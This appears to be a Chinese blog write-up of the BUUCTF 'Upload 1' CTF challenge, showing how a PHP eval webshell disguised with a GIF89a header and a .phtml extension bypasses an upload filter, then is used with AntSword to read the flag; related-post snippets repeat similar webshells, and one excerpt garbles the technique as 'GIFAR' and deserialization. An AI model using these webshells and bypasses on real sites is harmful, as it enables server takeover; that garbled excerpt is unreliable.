BUUCTF——[极客大挑战 2019]Upload 1

最新推荐文章于 2025-10-16 16:43:52 发布
原创 最新推荐文章于 2025-10-16 16:43:52 发布 · 2.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细描述了一种PHP文件上传的绕过方法,通过构造包含PHP代码的图片文件头来规避系统检测。作者首先尝试上传PHP后门,然后将其伪装成jpg格式,但被系统阻止。接着,通过在图片头添加PHP代码并避免使用`<?php`标签,成功创建了一个不被系统识别为PHP的文件。最终,该文件以.phtml后缀上传并执行,实现了远程连接。利用蚁剑工具,作者找到了隐藏的flag,并展示了出来。

1.打开后发现是文件上传题
构建一句话木马

<?php @eval($_POST['shy']);?>

将一句话木马改成jpg文件尝试上传。
抓包改成php
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提示文件包含<?,那么我们有思路了,上传图片的时候还扫描了图片头,将一句话木马加图片头,并构建不包含<?>的一句话。

 GIF89a? 
 <script language="php">eval($_REQUEST[shell])</script>

在这里插入图片描述
抓包将jpg改为phtml后缀。
在这里插入图片描述
上传成功
在这里插入图片描述

用蚁剑连接
在这里插入图片描述
打开终端
在这里插入图片描述
使用cat命令查找flag
在这里插入图片描述

flag{d98de6c5-b03b-4f1b-bca6-7db9b2588f33}
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1633
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 2313
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
[极客挑战 2019]Upload 1
最新发布
2503_92869228的博客
10-16 423
本文详细介绍了绕过文件上传过滤的方法。首先确认存在后端格式过滤,通过修改文件头和使用gif图片绕过检测;然后通过burpsuite抓包修改文件扩展名为phtml,同时保持MIME类型不变,成功上传可执行图片马;最后利用蚁剑连接到上传文件获取flag。整个过程展示了如何系统性绕过文件上传的多重安全检测。
第十届极客挑战——复现未解决的web和RE
A_dmin的博客
12-06 1385
第十届极客挑战——复现未解决的web和RE 第十届极客挑战——复现未解决的web和RE web - 性感黄阿姨,在线聊天 web - Eval evil code web - 服务端检测系统 web - 你有特洛伊么 web - 你读懂潇文清的网站了吗 RE - 阅兵你认真看了嘛? RE - python1
BUUCTF [极客挑战 2019]Upload1
2401_86572133的博客
03-30 925
脚本风格与简写风格可以绕过,但是煮波试了<% %>发现不行,看到佬温馨《提醒如果使用简写风格或者ASP风格,则应该在php.ini配置文件中修改如下配置,把这两个参数都设置为On,考虑到这两种风格的移植性较差,通常不推荐使用。最开始查的时候查到将一句话木马插入图片的方法,后来发现可以直接写一句话木马然后用burpsuite抓包的时候再修改数据包,进行绕过。直接地址+/upload+/(上传文件名),连接成功,找到flag。打开以后发现有文件上传的地方,不难看出是文件上传漏洞。还是不行,发生了什么?
BUUCTF】[极客挑战 2019]Upload1
aoao331198的博客
03-13 1225
试着上传一个一句话木马的.jpg文件 <?phpeval($_GET['abc']); ?> 看样子是不能用php,必须换一种语言 仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗 GIF89a图片头文件欺骗 上传成功了,接下来我们在BP中上传,截获数据包,并且把 ...
BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 1299
文件上传冲啊!!!!!!
BUUCTF——[极客挑战 2019]Secret File 1
2303_77380355的博客
03-27 398
用burpsuite抓包,发现一个注释链接。得到base64,进行解码得到flag。F12查看源码,进入链接。进入flag.php查看。F12查看源码,没有东西。点击SECRET进入。F12源码里没有东西。进入链接发现一串源码。
BUUCTF[极客挑战 2019]Secret File 1题解
2301_79896143的博客
06-02 1125
题目"Secret File 1"考察文件包含漏洞,通过分析网页源码发现隐藏入口Archive_room.php,利用BurpSuite拦截重定向后访问secr3t.php。该页面存在文件包含漏洞,但过滤了常用payload构造方式。最终使用php://filter协议绕过过滤,成功读取flag.php的base64编码内容,解码后获得flag。解题过程涉及源码分析、抓包工具使用和文件包含漏洞利用技巧。
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 6029
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
BUUCTF [极客挑战 2019] Upload
Senimo
12-17 2941
BUUCTF [极客挑战 2019] Upload 考点: 1. 启动环境: 有上传头像的地方,首先上传正常图片测试: 上传了一张.jpg格式的文件,也显示不是图片 后续测试.php、.txt都不行,可能不止限制了文件后缀,使用BurpSuite抓取数据包: ...
buuctf[ACTF2020 新生赛]Upload 1
qq_53175607的博客
12-06 857
1.打开题目,先上传一句话木马试试。 <script language='php'>@eval($_POST['love']);</script> 按照传统方法,现将一句话木马利用windows文件后缀识别的特点,将后缀名改为图片后缀名。 上传,抓包改包! 改为phtml后缀 上传成功,构架url用蚁剑连接。 http://5081ca11-6534-49bf-8f3b-94c45fc9946e.node4.buuoj.cn:81/uplo4d/38a64fe21fe9be
ctf题集【BUUCTF WEB】[极客挑战 2019]Upload1
qq_42667028的博客
01-06 2062
alert("whoami")
buuctf-[极客挑战 2019]Upload1
m0_62094846的博客
12-07 378
上传php,jpg,png,gif都报错 然后看wp GIF89a? <script language="php">eval($_REQUEST[feng])</script> 用这一串GIF89a伪造gif文件就行 真的上传不了假的上传成功了,就满脸问号 把后缀名改成phtml 因为没告诉文件上传后的位置,就要猜测,做这么多题,一般都是在upload里面 upload+文件名 ...
BUUCTF---[极客挑战 2019]Upload1
2201_75556700的博客
03-03 830
2.点开链接,需要上传文件,要求是image,上传文件后缀为jpg的一句话木马,发现被检测到了。4.接下来使用bp抓包修改包的后缀为phtml,5.接下来使用蚁剑链接。3.换另一个木马试试。
BUUCTF-[ACTF2020 新生赛]Upload1
Monica的博客
09-22 2165
目录 题目: 分析: 题目: 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞 分析: 先随便上传一个文件,发现提示 并且bp抓包并没有抓到包,说明为前端检测过滤。 那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。 先上传一个jpg文件,内容为<?php phpinfo();?>。 发现后端还是进行了检查过滤 那就试试其他几种后缀: 绕过后缀的有文件格式有php,php3,php...
CTF中的BUUCTF之[极客挑战 2019]Upload
weixin_44632787的博客
06-17 708
CTF中的BUUCTF之[极客挑战 2019]Upload 启动我们的挑战项目 这个界面,一看就知道是文件上传的类型的题目了 所以用我之前准备好的一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 之所以用这种一句话木马,是因为这种过滤方法比原版的:<?php @eval($_POST['attack']);?> 要好用。(个人观点) 将上面的一句话木马保存为1.png。 然后开
buuctf [ACTF2020 新生赛]Upload 1
Naptmn的博客
02-24 1315
直接上传一个php的一句话发现无法上传 f12找到前端验证 这里有两个方法 1、直接删除这个元素 2、先上传jpg格式的一句话,bp抓包改为php 发现上传后后端仍然有检查 于是我们上传phtml格式的一句话木马(这里同样需要绕开前端验证) phtml可以理解为是另外一个php的文件后缀名 上传成功后蚁剑连接即可 ...
buuctf [极客挑战 2019]Upload 1
02-07
### 关于 BUUCTF 极客挑战 2019Upload 1 题目分析 #### 背景介绍 BUUCTF 是一个知名的网络安全竞赛平台,其中的极客挑战系列题目涵盖了多种安全漏洞利用技巧。Upload 1 属于文件上传类题目,在这类题目中通常会涉及到服务器端对于上传文件类型的验证机制以及可能存在的绕过方法。 #### 文件上传漏洞原理 当 Web 应用程序允许用户上传文件时,如果对上传的内容缺乏严格的安全检查,则可能导致攻击者能够上传恶意脚本并执行任意代码。常见的防御措施包括但不限于 MIME 类型检测、扩展名过滤等[^1]。 #### 解题思路 针对此题目的具体实现方式可以归纳为以下几个方面: - **MIME 类型伪造** PHP 使用 `$_FILES` 数组来处理上传的数据,默认情况下仅依赖客户端提供的 Content-Type 头部信息判断文件类型。然而这些头部是可以被轻易篡改的。因此可以通过修改 HTTP 请求中的相应部分使服务端误认为所提交的是合法图片而非其他形式的可执行文件。 - **PHP 后门植入** 利用上述手段成功上传 .php 结尾或其他能被执行解释器解析运行的文件之后,便可以在该文件内嵌入一段用于远程控制目标主机的小段落,比如一句话木马: ```php <?php @eval($_POST['cmd']);?> ``` - **绕过白名单限制** 如果存在基于文件头特征码(magic number)或者图像尺寸小等方面更严格的校验逻辑的话,那么就需要寻找特定格式下既满足条件又隐藏有潜在威胁特性的样本作为载体;或者是探索是否有其它途径可以直接影响到最终保存路径从而规避掉这部分审核流程。 #### 实际操作案例展示 假设当前环境已经确认支持 GIF89a 开始标记并且不会因为后续附加内容而报错的情况下,我们可以构造这样一个混合体——即所谓的“GIFAR”(Gif+Jar) 攻击向量: ```gif GIF89a; <?php @eval($_POST['cmd']);?> ``` 将其命名为 `.jpg.php` 或类似的双后缀命名模式尝试突破单纯的字符串匹配规则限制,并通过浏览器访问触发反序列化过程完成提权动作获取 shell 访问权限。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值